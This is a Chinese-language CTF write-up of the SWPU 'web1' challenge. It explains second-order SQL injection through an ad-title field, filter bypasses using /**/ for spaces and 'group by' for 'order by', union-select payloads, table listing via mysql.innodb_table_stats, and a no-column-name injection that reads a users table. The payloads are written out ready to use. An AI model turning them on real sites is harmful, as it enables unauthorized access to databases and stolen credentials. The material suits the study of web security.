SWPU web1 ~~不会编程的崽
sql注入花样多,做完这个又学废了。直接看界面
这个界面太熟悉不过了。但爆破,dirsearch,与密码覆盖都没成功。只能注册账户了。
注册后,发现有广告申请,随便写点什么看看结果。
id=1,尝试盲注,也没成功。所以猜想注入点应该在申请广告的标题这。
查询语句 select * from 表 where name=广告名。结论:这里可以二次注入
测试过滤,有空格,"order","information","#","--+","-- q"被过滤了
1.绕过order&空格&注释符
1'/**/group/**/by/**/22,/**/'空格用"/**/"代替
group代替order
引号代替注释符形成闭合
最后在23报错,现在构造select语句 。
2.select爆注入点
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
3.查询库名
-1'/**/union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
4.绕过information,这里information_schema肯定用不了了。
InnoDb引擎
从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加 了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信 息,但是没有存储列名。
sys数据库
在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和 performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来 获取表名。
使用mysql.innodb_table_stats代替
-1' /**/union /**/all /**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 /**//**/from /**//**/mysql.innodb_table_stats/**/where /**/database_name='web1'/**/'但是mysql.innodb_table_stats只查到表名,所以不知道列名;
所以后边就有了无列名注入
ok,拿到表名就可以开始无列名注入了
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'语句是这个
-1'union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
先简化一下 ,去掉/**/
-1'union select 1,(select group_concat(b) from (select 1,2,3 as b union select * from users)k),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
union select会将前后的select语句的查询结果整合在一起,形成一张表。
select 1 as a,2,3 as b union select * from users的含义是把users表的查询结果整合在1,2,3一起。并将3这一列命名为b。
select group_concat(b) 这一句就可以把整合好的b这一列赛选出来。
详细的无列名注入可参考其他文章
本来怀着高兴的心情做做母校的题,只能说又学废一点点。